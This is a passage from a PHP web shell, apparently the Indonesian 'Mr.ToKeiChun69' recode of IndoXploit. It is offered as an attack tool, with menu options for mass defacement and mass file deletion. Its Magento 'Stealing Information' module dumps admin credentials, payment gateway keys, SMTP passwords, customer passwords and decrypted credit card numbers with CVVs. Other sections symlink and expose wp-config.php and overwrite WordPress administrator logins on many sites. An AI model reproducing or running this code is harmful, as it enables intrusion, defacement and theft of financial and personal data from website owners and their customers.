  723.         }
  724.     }
  725.     function gass_all(){
  726.         global $index ;
  727.         $dirrall=$_POST['d_dir'];
  728.         foreach (ListFiles($dirrall) as $key=>$file){
  729.             $file = str_replace('//',"/",$file);
  730.             echo "<center><strong>$file</strong> ===>";
  731.             edit_file($file,$index);
  732.             flush();
  733.         }
  734.         $key = $key+1;
  735.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  736.     function sabun_massal($dir,$namafile,$isi_script) {
  737.         if(is_writable($dir)) {
  738.             $dira = scandir($dir);
  739.             foreach($dira as $dirb) {
  740.                 $dirc = "$dir/$dirb";
  741.                 $lokasi = $dirc.'/'.$namafile;
  742.                 if($dirb === '.') {
  743.                     file_put_contents($lokasi, $isi_script);
  744.                 } elseif($dirb === '..') {
  745.                     file_put_contents($lokasi, $isi_script);
  746.                 } else {
  747.                     if(is_dir($dirc)) {
  748.                         if(is_writable($dirc)) {
  749.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  750.                             file_put_contents($lokasi, $isi_script);
  751.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  752.                         }
  753.                     }
  754.                 }
  755.             }
  756.         }
  757.     }
  758.     if($_POST['mass'] == 'onedir') {
  759.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  760.         $ini="http://";
  761.         $mainpath=$_POST[d_dir];
  762.         $file=$_POST[d_file];
  763.         $dir=opendir("$mainpath");
  764.         $code=base64_encode($_POST[script]);
  765.         $indx=base64_decode($code);
  766.         while($row=readdir($dir)){
  767.         $start=@fopen("$row/$file","w+");
  768.         $finish=@fwrite($start,$indx);
  769.         if ($finish){
  770.             echo"$ini$row/$file\n";
  771.             }
  772.         }
  773.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  774.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  775.         $dir=opendir("$mainpath");
  776.         $code=base64_encode($_POST[script]);
  777.         $indx=base64_decode($code);
  778.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  779.         $finish=@fwrite($start,$indx);
  780.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  781.         }
  782.  
  783.     }
  784.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  785.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  786.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  787.     elseif($_POST['mass'] == 'massdeface') {
  788.         echo "<div style='margin: 5px auto; padding: 5px'>";
  789.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  790.         echo "</div>";  }
  791.     else {
  792.         echo "
  793.         <center><font style='text-decoration: underline;'>
  794.         Select Type:<br>
  795.         </font>
  796.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  797.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  798.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  799.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  800.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  801.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  802.         <font style='text-decoration: underline;'>Folder:</font><br>
  803.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  804.         <font style='text-decoration: underline;'>Filename:</font><br>
  805.         <input type='text' name='d_file' value='readthis.html' style='width: 450px;' height='10'><br>
  806.         <font style='text-decoration: underline;'>Index File:</font><br>
  807.         <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Mr.ToKeiChun69</textarea><br>
  808.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  809.         </form></center>";
  810.         }
  811.     }
  812. elseif($_GET['do'] == 'magen') {
  813. echo'
  814. <div id="page-wrap">  
  815. <center>  
  816. <br>  
  817. <FORM action=""  method="post">  
  818. <div align="center">[M A G E N T O] - Stealing Information<br>  
  819. <div align="center">coder: sohai & n4KuLa_<br>  
  820. <input type="hidden" name="form_action" value="2">  
  821. </div>  
  822. </div>  
  823. ';  
  824.  
  825.  
  826. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){  
  827.     $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');  
  828.     if(isset($xml->global->resources->default_setup->connection)) {  
  829.        $connection = $xml->global->resources->default_setup->connection;  
  830.        $prefix = $xml->global->resources->db->table_prefix;  
  831.        $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1  
  832.        require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';  
  833.          
  834.        try {  
  835.            $app = Mage::app('default');  
  836.            Mage::getSingleton('core/session', array('name'=>'frontend'));  
  837.        }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}  
  838.  
  839.        if (!mysql_connect($connection->host, $connection->username, $connection->password)){  
  840.            print("Could not connect: " . mysql_error());  
  841.        }  
  842.        mysql_select_db($connection->dbname);  
  843.        echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";  
  844.  
  845.     $crypto = new Varien_Crypt_Mcrypt();  
  846.     $crypto->init($key);  
  847.  
  848.     //=========================================================================================================  
  849.     $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");  
  850.     if (!$query){  
  851.           echo "<center><b>Gagal</b></center>";  
  852.     }else{  
  853.             $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));  
  854.           echo'<br><br>  
  855.                 ====================================================================<br>  
  856.                                 [ Admin FROM website : '.$site['website'].'] <br>  
  857.                 ====================================================================<br>';  
  858.     }  
  859.     echo "  
  860.     <table border='1' align='center' >  
  861.     <tr>  
  862.     <td>id</td>  
  863.     <td>firstname</td>  
  864.     <td>lastname</td>  
  865.     <td>email</td>  
  866.     <td>username</td>  
  867.     <td>password</td>  
  868.     </tr>";  
  869.         while($vx = mysql_fetch_array($query)) {  
  870.         $no = 1;  
  871.         $user_id = $vx['user_id'];  
  872.         $username = $vx['username'];  
  873.         $password = $vx['password'];  
  874.         $email = $vx['email'];  
  875.         $firstname = $vx['firstname'];  
  876.         $lastname = $vx['lastname'];  
  877.         echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";  
  878.         }  
  879.     echo "</table><br>";  
  880.     //=========================================================================================================  
  881.     $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where  path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");  
  882.     if(mysql_num_rows($query) != 0){  
  883.         if (!$query){  
  884.               echo "<center><b>Gagal</b></center>";  
  885.         }else{  
  886.               echo'<br><br>  
  887.                     ====================================================================<br>  
  888.                                     [ Authorizenet ] <br>  
  889.                     ====================================================================<br>';  
  890.         }  
  891.         echo "  
  892.         <table border='1' align='center' >  
  893.         <tr>  
  894.         <td>no</td>  
  895.         <td>user</td>  
  896.         <td>pass</td>      
  897.         </tr>";  
  898.             $no = 1;  
  899.             while($vx = mysql_fetch_array($query)) {  
  900.             $user = $crypto->decrypt($vx['user']);  
  901.             $pass = $crypto->decrypt($vx['pass']);  
  902.  
  903.              
  904.             echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  905.             $no++;  
  906.             }  
  907.         echo "</table><br>";  
  908.     }  
  909.     //=========================================================================================================  
  910.     $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");  
  911.     if(mysql_num_rows($query_smtp) != 0){  
  912.         if (!$query_smtp){  
  913.               echo "<center><b>Gagal</b></center>";  
  914.         }else{  
  915.               echo'<br><br>  
  916.                     ====================================================================<br>  
  917.                                     [ SMTP ] <br>  
  918.                     ====================================================================<br>';  
  919.         }  
  920.         echo "  
  921.         <table border='1' align='center' >  
  922.         <tr>  
  923.         <td>no</td>  
  924.         <td>host</td>          
  925.         <td>port</td>  
  926.         <td>user</td>  
  927.         <td>pass</td>      
  928.         </tr>";  
  929.             $no = 1;  
  930.             $batas = 0;  
  931.             while($rows = mysql_fetch_array($query_smtp)) {  
  932.                 $smtphost = $rows[0];  
  933.                 $smtpport = $rows[1];  
  934.                 $smtpuser = $rows[2];  
  935.                 $smtppass = $rows[3];  
  936.                 echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";  
  937.                 $no++;  
  938.             }  
  939.         echo "</table><br>";  
  940.     }  
  941.     //=========================================================================================================  
  942.     $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'");  
  943.     $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  944.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){  
  945.           echo'<br><br>  
  946.                 ====================================================================<br>  
  947.                                 [ Credit Card ] <br>  
  948.                 ====================================================================<br>';  
  949.             echo "  
  950.             <table border='1' align='left' >  
  951.             <tr>  
  952.             <td>no</td>  
  953.             <td>Date</td>  
  954.             <td>Credit Owner</td>  
  955.             <td>method</td>  
  956.             <td>Credit Number</td>  
  957.             <td>Credit Exp</td>  
  958.             <td>CVV</td>  
  959.             <td>Address</td>  
  960.             </tr>";  
  961.                 $no = 1;  
  962.                 $batas = 0;  
  963.                 while($vx = mysql_fetch_array($query)){  
  964.                 $date = $vx['updated_at'];  
  965.                 $cc_owner = $vx['cc_owner'];  
  966.                 $method = $vx['method'];  
  967.                 $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);  
  968.                 $exp = $vx['exp'];          
  969.                 $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);      
  970.                 $Billing_Address = $vx['Billing Address'];  
  971.                 echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";  
  972.                 $batas = $no++;  
  973.                 }  
  974.                  
  975.                 while($vx2 = mysql_fetch_array($query2)){  
  976.                     $batas +=1;  
  977.                 $cc_owner = $vx2['cc_owner'];  
  978.                 $method = $vx2['method'];  
  979.                 $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);  
  980.                 $exp = $vx2['exp'];          
  981.                 $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);  
  982.                 $Billing_Address = $vx2['Billing Address'];  
  983.                 echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";  
  984.                  $batas++;  
  985.                 }      
  986.                  
  987.             echo "</table><br>";      
  988.     }  
  989.     //=========================================================================================================  
  990.     $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");  
  991.     $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");  
  992.      
  993.      
  994.     if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){  
  995.         if (!$query){  
  996.               echo "<center><b>Gagal</b></center>";  
  997.         }else{  
  998.               echo'<br><br>  
  999.                     ====================================================================<br>  
  1000.                                     [ Customer ] <br>  
  1001.                     ====================================================================<br>';  
  1002.         }  
  1003.         echo "  
  1004.         <table border='1' align='center' >  
  1005.         <tr>  
  1006.         <td>no</td>  
  1007.         <td>user</td>  
  1008.         <td>pass</td>      
  1009.         </tr>";  
  1010.             $no = 1;  
  1011.             $batas = 0;  
  1012.             while($vx = mysql_fetch_array($query)) {  
  1013.                 $user = $vx['email'];  
  1014.                 $pass = $vx['value'];  
  1015.                 echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";  
  1016.                 $batas = $no++;  
  1017.             }  
  1018.              
  1019.             if(mysql_num_rows($query2) != 0 && ($query2)){  
  1020.                 while($vx2 = mysql_fetch_array($query2)){  
  1021.                     $user = $vx2['customer_email'];  
  1022.                     $pass = $crypto->decrypt($vx2['password_hash']);  
  1023.                     if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin  
  1024.                         $batas +=1;  
  1025.                         echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";  
  1026.                         $batas++;  
  1027.                     }  
  1028.                 }                  
  1029.             }  
  1030.          
  1031.         echo "</table><br>";  
  1032.     }  
  1033.     //=========================================================================================================  
  1034.   }  
  1035. }  
  1036. function save($format,$data){  
  1037.     $fp = fopen($format, 'a');  
  1038.     fwrite($fp, $data);  
  1039.     fclose($fp);  
  1040. }  
  1041. function cekbase64($string){  
  1042.         $decoded = base64_decode($string, true);  
  1043.         if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;  
  1044.         if(!base64_decode($string, true)) return false;  
  1045.         if(base64_encode($decoded) != $string) return false;  
  1046.         return true;//nilai return 1 jika true  
  1047.     }  
  1048. //----untuk decode password ---/  
  1049. class Varien_Crypt_Mcrypt{  
  1050.     /**  
  1051.      * Constuctor  
  1052.      *  
  1053.      * @param array $data  
  1054.      */  
  1055.     public function __construct()  
  1056.     {  
  1057.     }  
  1058.  
  1059.     /**  
  1060.      * Initialize mcrypt module  
  1061.      *  
  1062.      * @param string $key cipher private key  
  1063.      * @return Varien_Crypt_Mcrypt  
  1064.      */  
  1065.     public function init($key)  
  1066.     {  
  1067.         $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');  
  1068.         $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);  
  1069.         $maxKeySize = mcrypt_enc_get_key_size($this->handler);  
  1070.  
  1071.         if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {  
  1072.             //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);  
  1073.             return null;  
  1074.         }  
  1075.  
  1076.         mcrypt_generic_init($this->handler, $key, $iv);  
  1077.  
  1078.         return $this;  
  1079.     }  
  1080.  
  1081.     /**  
  1082.      * Encrypt data  
  1083.      *  
  1084.      * @param string $data source string  
  1085.      * @return string  
  1086.      */  
  1087.     public function encrypt($data)  
  1088.     {  
  1089.         if (!$this->handler) {  
  1090.             //throw new Varien_Exception('Crypt module is not initialized.');  
  1091.             return null;  
  1092.         }  
  1093.         if (strlen($data) == 0) {  
  1094.             return $data;  
  1095.         }  
  1096.         return base64_encode(mcrypt_generic($this->handler, $data));  
  1097.     }  
  1098.  
  1099.     /**  
  1100.      * Decrypt data  
  1101.      *  
  1102.      * @param string $data encrypted string  
  1103.      * @return string  
  1104.      */  
  1105.     public function decrypt($data)  
  1106.     {  
  1107.         if (!$this->handler) {  
  1108.             //throw new Varien_Exception('Crypt module is not initialized.');  
  1109.             return null;  
  1110.         }  
  1111.         if (strlen($data) == 0) {  
  1112.             return $data;  
  1113.         }  
  1114.         return mdecrypt_generic($this->handler, base64_decode($data));  
  1115.     }  
  1116.          
  1117.    
  1118.     /**  
  1119.      * Desctruct cipher module  
  1120.      *  
  1121.      */  
  1122.     public function __destruct()  
  1123.     {  
  1124.         if ($this->handler) {  
  1125.             $this->_reset();  
  1126.         }  
  1127.     }  
  1128.  
  1129.     protected function _reset()  
  1130.     {  
  1131.         mcrypt_generic_deinit($this->handler);  
  1132.         mcrypt_module_close($this->handler);  
  1133.     }  
  1134. }  
  1135. }
  1136. elseif($_GET['do'] == 'zip') {
  1137.     echo "<center><h1>Zip Menu</h1>";
  1138. function rmdir_recursive($dir) {
  1139.     foreach(scandir($dir) as $file) {
  1140.        if ('.' === $file || '..' === $file) continue;
  1141.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1142.        else unlink("$dir/$file");
  1143.    }
  1144.    rmdir($dir);
  1145. }
  1146. if($_FILES["zip_file"]["name"]) {
  1147.     $filename = $_FILES["zip_file"]["name"];
  1148.     $source = $_FILES["zip_file"]["tmp_name"];
  1149.     $type = $_FILES["zip_file"]["type"];
  1150.     $name = explode(".", $filename);
  1151.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1152.     foreach($accepted_types as $mime_type) {
  1153.         if($mime_type == $type) {
  1154.             $okay = true;
  1155.             break;
  1156.         }
  1157.     }
  1158.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  1159.     if(!$continue) {
  1160.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  1161.     }
  1162.   $path = dirname(__FILE__).'/';
  1163.   $filenoext = basename ($filename, '.zip');
  1164.   $filenoext = basename ($filenoext, '.ZIP');
  1165.   $targetdir = $path . $filenoext;
  1166.   $targetzip = $path . $filename;
  1167.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  1168.   mkdir($targetdir, 0777);
  1169.     if(move_uploaded_file($source, $targetzip)) {
  1170.         $zip = new ZipArchive();
  1171.         $x = $zip->open($targetzip);
  1172.         if ($x === true) {
  1173.             $zip->extractTo($targetdir);
  1174.             $zip->close();
  1175.  
  1176.             unlink($targetzip);
  1177.         }
  1178.         $message = "<b>Sukses Gan :)</b>";
  1179.     } else {   
  1180.         $message = "<b>Error Gan :(</b>";
  1181.     }
  1182. }  
  1183. echo '<table style="width:100%" border="1">
  1184.   <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1185. <label>Zip File : <input type="file" name="zip_file" /></label>
  1186. <input type="submit" name="submit" value="Upload And Unzip" />
  1187. </form>';
  1188. if($message) echo "<p>$message</p>";
  1189. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";  
  1190.     if($_POST['backup']){
  1191.     $save=$_POST['save'];
  1192.     function Zip($source, $destination)
  1193. {
  1194.     if (extension_loaded('zip') === true)
  1195.     {
  1196.         if (file_exists($source) === true)
  1197.         {
  1198.             $zip = new ZipArchive();
  1199.  
  1200.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1201.             {
  1202.                 $source = realpath($source);
  1203.  
  1204.                 if (is_dir($source) === true)
  1205.                 {
  1206.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1207.  
  1208.                     foreach ($files as $file)
  1209.                     {
  1210.                         $file = realpath($file);
  1211.  
  1212.                         if (is_dir($file) === true)
  1213.                         {
  1214.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1215.                         }
  1216.  
  1217.                         else if (is_file($file) === true)
  1218.                         {
  1219.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1220.                         }
  1221.                     }
  1222.                 }
  1223.  
  1224.                 else if (is_file($source) === true)
  1225.                 {
  1226.                     $zip->addFromString(basename($source), file_get_contents($source));
  1227.                 }
  1228.             }
  1229.  
  1230.             return $zip->close();
  1231.         }
  1232.     }
  1233.  
  1234.     return false;
  1235. }
  1236.     Zip($_POST['dir'],$save);
  1237.     echo "Done , Save To <b>$save</b>";
  1238.     }
  1239.     echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/tkc_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1240.     if($_POST['extrak']){
  1241.     $save=$_POST['save'];
  1242.     $zip = new ZipArchive;
  1243.     $res = $zip->open($_POST['dir']);
  1244.     if ($res === TRUE) {
  1245.         $zip->extractTo($save);
  1246.         $zip->close();
  1247.     echo 'Succes , Location : <b>'.$save.'</b>';
  1248.     } else {
  1249.     echo 'Gagal Mas :( Ntahlah !';
  1250.     }
  1251.     }
  1252. echo '</tr></table>';
  1253.     } elseif($_GET['do'] == 'loghunter')
  1254.     {
  1255. echo '<center><h2>Log Hunter</h2></center>';    
  1256.         echo "<Center>\n";
  1257. echo "<form action=\"\" method=\"post\">\n";
  1258. ?><br>Dir :<input type="text" value="<?=getcwd();?>" name="shc_dir"><?php
  1259. echo "<input type=\"submit\" name=\"submit\" class=\"kotak\" value=\"Scan Now!\"/>\n";
  1260. echo "</form>\n";
  1261. echo "<pre style=\"text-align: left;\">\n";
  1262. error_reporting(0);
  1263. /*
  1264. Name    : Log Hunter (Grab Email)
  1265. Date    : 26/03/2016 05:53 PM
  1266. Link    : http://facebook.com/bug7sec
  1267. Link    : http://pastebin.com/u/shor7cut
  1268. Author  : Shor7cut
  1269. */
  1270.  
  1271.  
  1272. if($_POST['submit']){
  1273. function tampilkan($shcdirs){
  1274. foreach(scandir($shcdirs) as $shc)
  1275.     {
  1276.         if($shc!='.' && $shc!='..')
  1277.         {
  1278.             $shc = $shcdirs.DIRECTORY_SEPARATOR.$shc;
  1279.             if( !is_dir($shc) && !eregi("css", $shc) ){
  1280.  
  1281.                 $fgt    = file_get_contents($shc);
  1282.                 $ifgt   = exif_read_data($shc);
  1283.                 $jembut = "COMPUTED";
  1284.                 $taik   = "UserComment";
  1285.                 $shcm = "/mail['(']/";
  1286.                 if($ifgt[$jembut][$taik]){
  1287.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font><br>";
  1288.                 }
  1289.                 preg_match_all('#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#',$fgt,$cocok);
  1290.                 $hcs  = "/base64_decode/";
  1291.                 $exif = "/exif_read_data/";
  1292.                 preg_match($shcm, addslashes($fgt), $mailshc);
  1293.                 preg_match($hcs,  addslashes($fgt), $shcmar);
  1294.                 preg_match($exif, addslashes($fgt), $shcxif);
  1295.                 if(eregi('HTTP Cookie File', $fgt) || eregi('PHP Warning:', $fgt) ){
  1296.                 }
  1297.                 if(eregi('tmp_name', $fgt)){
  1298.                     echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>".$shc."</font><br>";
  1299.                 }
  1300.                 if($shcmar[0]){
  1301.                     echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>".$shc."</font><br>";
  1302.                 }
  1303.                 if($mailshc[0]){
  1304.                     echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>".$shc."</font><br>";
  1305.                 }
  1306.                 if($shcxif[0]){
  1307.                     echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>".$shc."</font> </font><font color=red>{Manual Check}</font><br>";
  1308.                 }
  1309.                 if(eregi("js", $shc)){
  1310.                             echo "[<font color=red>Javascript</font>] <font color=#2196F3>".$shc."</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>";
  1311.                 }
  1312.                 if($cocok[0]){
  1313.                     foreach ($cocok[0] as $key => $shcmail) {
  1314.                         if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) {
  1315.                             echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>".$shc."</font> { ".$shcmail." }<br>";
  1316.                         }
  1317.                     }
  1318.                 }
  1319.            
  1320.             }else{
  1321.                 tampilkan($shc);
  1322.             }
  1323.         }
  1324.     }
  1325. }
  1326. tampilkan($_POST['shc_dir']);
  1327. }
  1328. echo "</pre>\n";
  1329. echo "</Center>\n";}   
  1330. elseif($_GET['do'] == 'metu') {
  1331.    
  1332.  
  1333. echo '<form action="?dir=$dir&do=metu" method="post">';
  1334.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1335.     echo 'Byee !';
  1336.    
  1337. }
  1338. elseif($_GET['do'] == 'about') {
  1339.    
  1340.     echo '<center>Mr.ToKeiChun69 Shell<hr>IndoXploit Shell Recoded By Mr.ToKeiChun59<br><a href="https://www.facebook.com/tokeichun.sh">Here</a>';
  1341. }
  1342. elseif($_GET['do'] == 'symlink404') {
  1343. echo "<center>
  1344. <form method='post'>
  1345. <br>File Target: <input type='text' name='dir' size='50' value='/home/user/public_html/wp-config.php'>
  1346. <br>Save As: <input type='text' name='jnck' size='50' value='config404.txt'><br><input name='sym404' type='submit' value='Eksekusi Gan'></form><br>";
  1347. @error_reporting(0);
  1348. @ini_set('display_errors', 0);
  1349. if($_POST['sym404']){
  1350. rmdir("sym404");mkdir("sym404", 0777);
  1351. $dir = $_POST['dir'];
  1352. $jnck = $_POST['jnck'];
  1353. system("ln -s ".$dir." sym404/".$jnck);
  1354. symlink($dir,"sym404/".$jnck);
  1355. $inija = fopen("sym404/.htaccess", "w");
  1356. fwrite($inija,"Options Indexes FollowSymLinks
  1357. DirectoryIndex tokeichun.html
  1358. AddType text/plain .php
  1359. AddHandler text/plain .php
  1360. Satisfy Any
  1361.  
  1362. ReadmeName ".$jnck);
  1363. echo'<a href="sym404/">Succes! >:(</a>';
  1364. }
  1365.    
  1366. }
  1367. elseif($_GET['do'] == 'auto_cu_wp') {
  1368. if($_POST['gass']) {
  1369.     echo "<center><h1>WordPress Auto Change User 2</h1>
  1370.         <form method='post'>
  1371.         Link Config: <br>
  1372.         <textarea name='link' style='width: 450px; height:250px;'>";
  1373.     UrlLoop($_POST['linkconf'],'wordpress');   
  1374.     echo"</textarea><br>
  1375.         <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1376.         </form></center>";
  1377. }   else {
  1378.         echo "<center><h1>WordPress Auto Change User 2</h1>
  1379.         <form method='post'>
  1380.         Link Config: <br>
  1381.         <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/config/'><br>
  1382.         <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1383.         </form></center>";
  1384.     }
  1385. if($_POST['auto_cu_wp']) {
  1386.    
  1387.         function anucurl($sites) {
  1388.             $ch = curl_init($sites);
  1389.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1390.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1391.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1392.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1393.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1394.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1395.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1396.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1397.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1398.             $data = curl_exec($ch);
  1399.                   curl_close($ch);
  1400.             return $data;
  1401.         }
  1402.         $link = explode("\r\n", $_POST['link']);
  1403.         $user = "root@1337";
  1404.         $pass = "root@1337";
  1405.         $passx = md5($pass);
  1406.         foreach($link as $dir_config) {
  1407.             $config = anucurl($dir_config);
  1408.             $dbhost = ambilkata($config,"DB_HOST', '","'");
  1409.             $dbuser = ambilkata($config,"DB_USER', '","'");
  1410.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1411.             $dbname = ambilkata($config,"DB_NAME', '","'");
  1412.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1413.             $prefix = $dbprefix."users";
  1414.             $option = $dbprefix."options";
  1415.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1416.             $db = mysql_select_db($dbname);
  1417.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1418.             $result = mysql_fetch_array($q);
  1419.             $id = $result[ID];
  1420.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1421.             $result2 = mysql_fetch_array($q2);
  1422.             $target = $result2[option_value];
  1423.             if($target == '') {                
  1424.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1425.             } else {
  1426.                 echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1427.             }
  1428.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1429.             if(!$conn OR !$db OR !$update) {
